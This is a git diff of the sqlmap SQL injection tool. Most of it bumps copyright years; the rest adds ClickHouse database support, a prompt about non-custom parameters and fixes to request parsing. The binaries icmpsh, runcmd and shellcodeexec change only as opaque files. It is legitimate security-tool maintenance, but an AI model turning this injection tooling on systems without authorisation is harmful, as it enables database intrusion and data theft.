+Najlepšie je stiahnuť sqlmap naklonovaním [Git](https://github.com/sqlmapproject/sqlmap) repozitára:
+
+ git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
+
+sqlmap funguje bez problémov s programovacím jazykom [Python](https://www.python.org/download/) vo verziách **2.6**, **2.7** a **3.x** na akejkoľvek platforme.
+
+Využitie
+----
+
+Na získanie zoznamu základných možností a prepínačov, použite:
+
+ python sqlmap.py -h
+
+Na získanie zoznamu všetkých možností a prepínačov, použite:
+
+ python sqlmap.py -hh
+
+Vzorku behu nájdete [tu](https://asciinema.org/a/46601).
+Ak chcete získať prehľad o možnostiach sqlmap, zoznam podporovaných funkcií a opis všetkých možností a prepínačov spolu s príkladmi, odporúčame vám nahliadnuť do [Používateľskej príručky](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
+
+Linky
+----
+
+* Domovská stránka: https://sqlmap.org
+* Stiahnutia: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) alebo [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
+* Zdroje RSS Commits: https://github.com/sqlmapproject/sqlmap/commits/master.atom
+* Sledovač problémov: https://github.com/sqlmapproject/sqlmap/issues
+* Používateľská príručka: https://github.com/sqlmapproject/sqlmap/wiki
+* Často kladené otázky (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
+* Twitter: [@sqlmap](https://twitter.com/sqlmap)
+* Demá: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
+* Snímky obrazovky: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
\ No newline at end of file
diff --git a/extra/__init__.py b/extra/__init__.py
index a5b83a8fa..8476fab2f 100644
--- a/extra/__init__.py
+++ b/extra/__init__.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/extra/beep/__init__.py b/extra/beep/__init__.py
index a5b83a8fa..8476fab2f 100644
--- a/extra/beep/__init__.py
+++ b/extra/beep/__init__.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/extra/beep/beep.py b/extra/beep/beep.py
index b5542c3b8..ad9328340 100644
--- a/extra/beep/beep.py
+++ b/extra/beep/beep.py
@@ -3,7 +3,7 @@
"""
beep.py - Make a beep sound
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/extra/cloak/__init__.py b/extra/cloak/__init__.py
index a5b83a8fa..8476fab2f 100644
--- a/extra/cloak/__init__.py
+++ b/extra/cloak/__init__.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/extra/cloak/cloak.py b/extra/cloak/cloak.py
index ddaf90303..b9f8f8f0f 100644
--- a/extra/cloak/cloak.py
+++ b/extra/cloak/cloak.py
@@ -3,7 +3,7 @@
"""
cloak.py - Simple file encryption/compression utility
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -21,7 +21,7 @@ if sys.version_info >= (3, 0):
xrange = range
ord = lambda _: _
-KEY = b"ENWsCymUeJcXqSbD"
+KEY = b"E6wRbVhD0IBeCiGJ"
def xor(message, key):
return b"".join(struct.pack('B', ord(message[i]) ^ ord(key[i % len(key)])) for i in range(len(message)))
diff --git a/extra/dbgtool/__init__.py b/extra/dbgtool/__init__.py
index a5b83a8fa..8476fab2f 100644
--- a/extra/dbgtool/__init__.py
+++ b/extra/dbgtool/__init__.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/extra/dbgtool/dbgtool.py b/extra/dbgtool/dbgtool.py
index 6832980b8..c8e0c9733 100644
--- a/extra/dbgtool/dbgtool.py
+++ b/extra/dbgtool/dbgtool.py
@@ -3,7 +3,7 @@
"""
dbgtool.py - Portable executable to ASCII debug script converter
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/extra/icmpsh/icmpsh.exe_ b/extra/icmpsh/icmpsh.exe_
index 094450804..a909351bd 100644
Binary files a/extra/icmpsh/icmpsh.exe_ and b/extra/icmpsh/icmpsh.exe_ differ
diff --git a/extra/runcmd/runcmd.exe_ b/extra/runcmd/runcmd.exe_
index 26448b5dc..556eabb7b 100644
Binary files a/extra/runcmd/runcmd.exe_ and b/extra/runcmd/runcmd.exe_ differ
diff --git a/extra/shellcodeexec/windows/shellcodeexec.x32.exe_ b/extra/shellcodeexec/windows/shellcodeexec.x32.exe_
index 7c19a51b4..0cbe5404f 100644
Binary files a/extra/shellcodeexec/windows/shellcodeexec.x32.exe_ and b/extra/shellcodeexec/windows/shellcodeexec.x32.exe_ differ
diff --git a/extra/shutils/blanks.sh b/extra/shutils/blanks.sh
index 39bf14fec..bcc7440af 100755
--- a/extra/shutils/blanks.sh
+++ b/extra/shutils/blanks.sh
@@ -1,6 +1,6 @@
#!/bin/bash
-# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
# See the file 'LICENSE' for copying permission
# Removes trailing spaces from blank lines inside project files
diff --git a/extra/shutils/drei.sh b/extra/shutils/drei.sh
index bf48851a0..9a75fbf2f 100755
--- a/extra/shutils/drei.sh
+++ b/extra/shutils/drei.sh
@@ -1,6 +1,6 @@
#!/bin/bash
-# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
# See the file 'LICENSE' for copying permission
# Stress test against Python3
diff --git a/extra/shutils/duplicates.py b/extra/shutils/duplicates.py
index 085909ea0..0278b85dc 100755
--- a/extra/shutils/duplicates.py
+++ b/extra/shutils/duplicates.py
@@ -1,6 +1,6 @@
#!/usr/bin/env python
-# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
# See the file 'LICENSE' for copying permission
# Removes duplicate entries in wordlist like files
diff --git a/extra/shutils/junk.sh b/extra/shutils/junk.sh
index 375dab751..e3bfc70b9 100755
--- a/extra/shutils/junk.sh
+++ b/extra/shutils/junk.sh
@@ -1,6 +1,6 @@
#!/bin/bash
-# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
# See the file 'LICENSE' for copying permission
find . -type d -name "__pycache__" -exec rm -rf {} \; &>/dev/null
diff --git a/extra/shutils/modernize.sh b/extra/shutils/modernize.sh
index 1bda50f5e..e0b5352d8 100755
--- a/extra/shutils/modernize.sh
+++ b/extra/shutils/modernize.sh
@@ -1,6 +1,6 @@
#!/bin/bash
-# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
# See the file 'LICENSE' for copying permission
# sudo pip install modernize
diff --git a/extra/shutils/pycodestyle.sh b/extra/shutils/pycodestyle.sh
index 137ea73ba..34d995cde 100755
--- a/extra/shutils/pycodestyle.sh
+++ b/extra/shutils/pycodestyle.sh
@@ -1,6 +1,6 @@
#!/bin/bash
-# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
# See the file 'LICENSE' for copying permission
# Runs pycodestyle on all python files (prerequisite: pip install pycodestyle)
diff --git a/extra/shutils/pydiatra.sh b/extra/shutils/pydiatra.sh
index 9e45e61ef..6f964e747 100755
--- a/extra/shutils/pydiatra.sh
+++ b/extra/shutils/pydiatra.sh
@@ -1,6 +1,6 @@
#!/bin/bash
-# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
# See the file 'LICENSE' for copying permission
# Runs py3diatra on all python files (prerequisite: pip install pydiatra)
diff --git a/extra/shutils/pyflakes.sh b/extra/shutils/pyflakes.sh
index eb4640542..9d64d9893 100755
--- a/extra/shutils/pyflakes.sh
+++ b/extra/shutils/pyflakes.sh
@@ -1,6 +1,6 @@
#!/bin/bash
-# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
# See the file 'LICENSE' for copying permission
# Runs pyflakes on all python files (prerequisite: apt-get install pyflakes)
diff --git a/extra/shutils/pylint.sh b/extra/shutils/pylint.sh
index 2dc13c073..b8898be2d 100755
--- a/extra/shutils/pylint.sh
+++ b/extra/shutils/pylint.sh
@@ -1,6 +1,6 @@
#!/bin/bash
-# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
# See the file 'LICENSE' for copying permission
find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec pylint --rcfile=./.pylintrc '{}' \;
diff --git a/extra/shutils/pypi.sh b/extra/shutils/pypi.sh
index c2b735ebb..4aed1e72d 100755
--- a/extra/shutils/pypi.sh
+++ b/extra/shutils/pypi.sh
@@ -16,7 +16,7 @@ cat > $TMP_DIR/setup.py << EOF
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -67,7 +67,7 @@ cat > sqlmap/__init__.py << EOF
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/extra/vulnserver/__init__.py b/extra/vulnserver/__init__.py
index a5b83a8fa..8476fab2f 100644
--- a/extra/vulnserver/__init__.py
+++ b/extra/vulnserver/__init__.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/extra/vulnserver/vulnserver.py b/extra/vulnserver/vulnserver.py
index 37d7df3c3..76f9c2376 100644
--- a/extra/vulnserver/vulnserver.py
+++ b/extra/vulnserver/vulnserver.py
@@ -3,7 +3,7 @@
"""
vulnserver.py - Trivial SQLi vulnerable HTTP server (Note: for testing purposes)
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/__init__.py b/lib/__init__.py
index a5b83a8fa..8476fab2f 100644
--- a/lib/__init__.py
+++ b/lib/__init__.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/controller/__init__.py b/lib/controller/__init__.py
index a5b83a8fa..8476fab2f 100644
--- a/lib/controller/__init__.py
+++ b/lib/controller/__init__.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/controller/action.py b/lib/controller/action.py
index 40f9b78d8..1aeb0bcc4 100644
--- a/lib/controller/action.py
+++ b/lib/controller/action.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/controller/checks.py b/lib/controller/checks.py
index 997abb3dc..b0d5fd6b5 100644
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/controller/controller.py b/lib/controller/controller.py
index 929a7c982..8441279a9 100644
--- a/lib/controller/controller.py
+++ b/lib/controller/controller.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -512,6 +512,23 @@ def start():
testSqlInj = True
paramKey = (conf.hostname, conf.path, place, parameter)
+ if kb.processUserMarks:
+ if testSqlInj and place not in (PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER):
+ if kb.processNonCustom is None:
+ message = "other non-custom parameters found. "
+ message += "Do you want to process them too? [Y/n/q] "
+ choice = readInput(message, default='Y').upper()
+
+ if choice == 'Q':
+ raise SqlmapUserQuitException
+ else:
+ kb.processNonCustom = choice == 'Y'
+
+ if not kb.processNonCustom:
+ infoMsg = "skipping %sparameter '%s'" % ("%s " % paramType if paramType != parameter else "", parameter)
+ logger.info(infoMsg)
+ continue
+
if paramKey in kb.testedParams:
testSqlInj = False
diff --git a/lib/controller/handler.py b/lib/controller/handler.py
index 1341fd44c..1c4994e84 100644
--- a/lib/controller/handler.py
+++ b/lib/controller/handler.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -14,6 +14,7 @@ from lib.core.exception import SqlmapConnectionException
from lib.core.settings import ACCESS_ALIASES
from lib.core.settings import ALTIBASE_ALIASES
from lib.core.settings import CACHE_ALIASES
+from lib.core.settings import CLICKHOUSE_ALIASES
from lib.core.settings import CRATEDB_ALIASES
from lib.core.settings import CUBRID_ALIASES
from lib.core.settings import DB2_ALIASES
@@ -46,6 +47,8 @@ from plugins.dbms.altibase.connector import Connector as AltibaseConn
from plugins.dbms.altibase import AltibaseMap
from plugins.dbms.cache.connector import Connector as CacheConn
from plugins.dbms.cache import CacheMap
+from plugins.dbms.clickhouse.connector import Connector as ClickHouseConn
+from plugins.dbms.clickhouse import ClickHouseMap
from plugins.dbms.cratedb.connector import Connector as CrateDBConn
from plugins.dbms.cratedb import CrateDBMap
from plugins.dbms.cubrid.connector import Connector as CubridConn
@@ -122,6 +125,7 @@ def setHandler():
(DBMS.PRESTO, PRESTO_ALIASES, PrestoMap, PrestoConn),
(DBMS.ALTIBASE, ALTIBASE_ALIASES, AltibaseMap, AltibaseConn),
(DBMS.MIMERSQL, MIMERSQL_ALIASES, MimerSQLMap, MimerSQLConn),
+ (DBMS.CLICKHOUSE, CLICKHOUSE_ALIASES, ClickHouseMap, ClickHouseConn),
(DBMS.CRATEDB, CRATEDB_ALIASES, CrateDBMap, CrateDBConn),
(DBMS.CUBRID, CUBRID_ALIASES, CubridMap, CubridConn),
(DBMS.CACHE, CACHE_ALIASES, CacheMap, CacheConn),
diff --git a/lib/core/__init__.py b/lib/core/__init__.py
index a5b83a8fa..8476fab2f 100644
--- a/lib/core/__init__.py
+++ b/lib/core/__init__.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/core/agent.py b/lib/core/agent.py
index b3f870082..539183e3f 100644
--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -489,7 +489,7 @@ class Agent(object):
if field and Backend.getIdentifiedDbms():
rootQuery = queries[Backend.getIdentifiedDbms()]
- if field.startswith("(CASE") or field.startswith("(IIF") or conf.noCast:
+ if field.startswith("(CASE") or field.startswith("(IIF") or conf.noCast and not (field.startswith("COUNT(") and getTechnique() in (PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.UNION) and Backend.getIdentifiedDbms() == DBMS.MSSQL):
nulledCastedField = field
else:
if not (Backend.isDbms(DBMS.SQLITE) and not isDBMSVersionAtLeast('3')):
@@ -596,6 +596,9 @@ class Agent(object):
if not _:
fieldsSelectFrom = None
+ if re.search(r"\bWHERE\b.+(MIN|MAX)", query, re.I):
+ fieldsMinMaxstr = None
+
fieldsToCastStr = fieldsNoSelect
if fieldsSubstr:
@@ -1024,8 +1027,8 @@ class Agent(object):
limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (num + 1, 1)
limitedQuery += " %s" % limitStr
- elif Backend.getIdentifiedDbms() in (DBMS.DERBY, DBMS.CRATEDB):
- limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (1, num)
+ elif Backend.getIdentifiedDbms() in (DBMS.DERBY, DBMS.CRATEDB, DBMS.CLICKHOUSE):
+ limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (num, 1)
limitedQuery += " %s" % limitStr
elif Backend.getIdentifiedDbms() in (DBMS.FRONTBASE, DBMS.VIRTUOSO):
diff --git a/lib/core/bigarray.py b/lib/core/bigarray.py
index 6bf001c5f..3cccd2d1e 100644
--- a/lib/core/bigarray.py
+++ b/lib/core/bigarray.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/core/common.py b/lib/core/common.py
index bf2006d72..c2ab0a0ed 100644
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -5327,6 +5327,7 @@ def parseRequestFile(reqFile, checkParams=True):
continue
getPostReq = False
+ forceBody = False
url = None
host = None
method = None
@@ -5347,7 +5348,7 @@ def parseRequestFile(reqFile, checkParams=True):
line = line.strip('\r')
match = re.search(r"\A([A-Z]+) (.+) HTTP/[\d.]+\Z", line) if not method else None
- if len(line.strip()) == 0 and method and method != HTTPMETHOD.GET and data is None:
+ if len(line.strip()) == 0 and method and (method != HTTPMETHOD.GET or forceBody) and data is None:
data = ""
params = True
@@ -5394,6 +5395,7 @@ def parseRequestFile(reqFile, checkParams=True):
# headers and consider the following lines as
# POSTed data
if key.upper() == HTTP_HEADER.CONTENT_LENGTH.upper():
+ forceBody = True
params = True
# Avoid proxy and connection type related headers
diff --git a/lib/core/compat.py b/lib/core/compat.py
index 6a7a40769..9952f663b 100644
--- a/lib/core/compat.py
+++ b/lib/core/compat.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -9,6 +9,7 @@ from __future__ import division
import binascii
import functools
+import inspect
import math
import os
import random
@@ -312,3 +313,20 @@ def LooseVersion(version):
result = float("NaN")
return result
+
+# Reference: https://github.com/bottlepy/bottle/blob/df67999584a0e51ec5b691146c7fa4f3c87f5aac/bottle.py
+if not hasattr(inspect, "getargspec") and hasattr(inspect, "getfullargspec"):
+ from inspect import getfullargspec
+
+ def makelist(data):
+ if isinstance(data, (tuple, list, set, dict)):
+ return list(data)
+ elif data:
+ return [data]
+ else:
+ return []
+
+ def getargspec(func):
+ spec = getfullargspec(func)
+ kwargs = makelist(spec[0]) + makelist(spec.kwonlyargs)
+ return kwargs, spec[1], spec[2], spec[3]
diff --git a/lib/core/convert.py b/lib/core/convert.py
index 4e7d02b62..c6f86aa1f 100644
--- a/lib/core/convert.py
+++ b/lib/core/convert.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/core/data.py b/lib/core/data.py
index 13551fe30..c2b4325d7 100644
--- a/lib/core/data.py
+++ b/lib/core/data.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/core/datatype.py b/lib/core/datatype.py
index 66dd10314..eadcb9cf7 100644
--- a/lib/core/datatype.py
+++ b/lib/core/datatype.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/core/decorators.py b/lib/core/decorators.py
index 3f23895d1..433ae3f95 100644
--- a/lib/core/decorators.py
+++ b/lib/core/decorators.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/core/defaults.py b/lib/core/defaults.py
index d4109c94f..54410f6db 100644
--- a/lib/core/defaults.py
+++ b/lib/core/defaults.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/core/dicts.py b/lib/core/dicts.py
index baae9643b..e031eca8e 100644
--- a/lib/core/dicts.py
+++ b/lib/core/dicts.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -38,6 +38,7 @@ from lib.core.settings import SQLITE_ALIASES
from lib.core.settings import SYBASE_ALIASES
from lib.core.settings import VERTICA_ALIASES
from lib.core.settings import VIRTUOSO_ALIASES
+from lib.core.settings import CLICKHOUSE_ALIASES
FIREBIRD_TYPES = {
261: "BLOB",
@@ -241,6 +242,7 @@ DBMS_DICT = {
DBMS.PRESTO: (PRESTO_ALIASES, "presto-python-client", "https://github.com/prestodb/presto-python-client", None),
DBMS.ALTIBASE: (ALTIBASE_ALIASES, None, None, None),
DBMS.MIMERSQL: (MIMERSQL_ALIASES, "mimerpy", "https://github.com/mimersql/MimerPy", None),
+ DBMS.CLICKHOUSE: (CLICKHOUSE_ALIASES, "clickhouse_connect", "https://github.com/ClickHouse/clickhouse-connect", None),
DBMS.CRATEDB: (CRATEDB_ALIASES, "python-psycopg2", "https://github.com/psycopg/psycopg2", "postgresql"),
DBMS.CUBRID: (CUBRID_ALIASES, "CUBRID-Python", "https://github.com/CUBRID/cubrid-python", None),
DBMS.CACHE: (CACHE_ALIASES, "python jaydebeapi & python-jpype", "https://pypi.python.org/pypi/JayDeBeApi/ & https://github.com/jpype-project/jpype", None),
@@ -268,7 +270,7 @@ HEURISTIC_NULL_EVAL = {
DBMS.ACCESS: "CVAR(NULL)",
DBMS.MAXDB: "ALPHA(NULL)",
DBMS.MSSQL: "DIFFERENCE(NULL,NULL)",
- DBMS.MYSQL: "QUARTER(NULL)",
+ DBMS.MYSQL: "QUARTER(NULL XOR NULL)",
DBMS.ORACLE: "INSTR2(NULL,NULL)",
DBMS.PGSQL: "QUOTE_IDENT(NULL)",
DBMS.SQLITE: "UNLIKELY(NULL)",
@@ -286,6 +288,7 @@ HEURISTIC_NULL_EVAL = {
DBMS.EXTREMEDB: "NULLIFZERO(hashcode(NULL))",
DBMS.RAIMA: "IF(ROWNUMBER()>0,CONVERT(NULL,TINYINT),NULL))",
DBMS.VIRTUOSO: "__MAX_NOTNULL(NULL)",
+ DBMS.CLICKHOUSE: "halfMD5(NULL) IS NULL",
}
SQL_STATEMENTS = {
diff --git a/lib/core/dump.py b/lib/core/dump.py
index 308849704..2e3cdfde6 100644
--- a/lib/core/dump.py
+++ b/lib/core/dump.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/core/enums.py b/lib/core/enums.py
index b5582f47f..f589e9de4 100644
--- a/lib/core/enums.py
+++ b/lib/core/enums.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -52,6 +52,7 @@ class DBMS(object):
PRESTO = "Presto"
ALTIBASE = "Altibase"
MIMERSQL = "MimerSQL"
+ CLICKHOUSE = "ClickHouse"
CRATEDB = "CrateDB"
CUBRID = "Cubrid"
CACHE = "InterSystems Cache"
@@ -81,6 +82,7 @@ class DBMS_DIRECTORY_NAME(object):
PRESTO = "presto"
ALTIBASE = "altibase"
MIMERSQL = "mimersql"
+ CLICKHOUSE = "clickhouse"
CRATEDB = "cratedb"
CUBRID = "cubrid"
CACHE = "cache"
diff --git a/lib/core/exception.py b/lib/core/exception.py
index 84eb88305..8e487ce30 100644
--- a/lib/core/exception.py
+++ b/lib/core/exception.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/core/gui.py b/lib/core/gui.py
index 6b839eca3..fa6f26949 100644
--- a/lib/core/gui.py
+++ b/lib/core/gui.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -223,7 +223,7 @@ def runGui(parser):
helpmenu.add_command(label="Wiki pages", command=lambda: webbrowser.open(WIKI_PAGE))
helpmenu.add_command(label="Report issue", command=lambda: webbrowser.open(ISSUES_PAGE))
helpmenu.add_separator()
- helpmenu.add_command(label="About", command=lambda: _tkinter_messagebox.showinfo("About", "Copyright (c) 2006-2022\n\n (%s)" % DEV_EMAIL_ADDRESS))
+ helpmenu.add_command(label="About", command=lambda: _tkinter_messagebox.showinfo("About", "Copyright (c) 2006-2023\n\n (%s)" % DEV_EMAIL_ADDRESS))
menubar.add_cascade(label="Help", menu=helpmenu)
window.config(menu=menubar)
diff --git a/lib/core/log.py b/lib/core/log.py
index 2737b3095..64e4f1b71 100644
--- a/lib/core/log.py
+++ b/lib/core/log.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/core/option.py b/lib/core/option.py
index 29570dcdb..7fc2116df 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -815,7 +815,7 @@ def _setTamperingFunctions():
priority = PRIORITY.NORMAL if not hasattr(module, "__priority__") else module.__priority__
for name, function in inspect.getmembers(module, inspect.isfunction):
- if name == "tamper" and (hasattr(inspect, "signature") and all(_ in inspect.signature(function).parameters for _ in ("payload", "kwargs")) or hasattr(inspect, "getargspec") and inspect.getargspec(function).args and inspect.getargspec(function).keywords == "kwargs"):
+ if name == "tamper" and (hasattr(inspect, "signature") and all(_ in inspect.signature(function).parameters for _ in ("payload", "kwargs")) or inspect.getargspec(function).args and inspect.getargspec(function).keywords == "kwargs"):
found = True
kb.tamperFunctions.append(function)
function.__name__ = module.__name__
@@ -1696,11 +1696,20 @@ def _cleanupOptions():
try:
conf.ignoreCode = [int(_) for _ in re.split(PARAMETER_SPLITTING_REGEX, conf.ignoreCode)]
except ValueError:
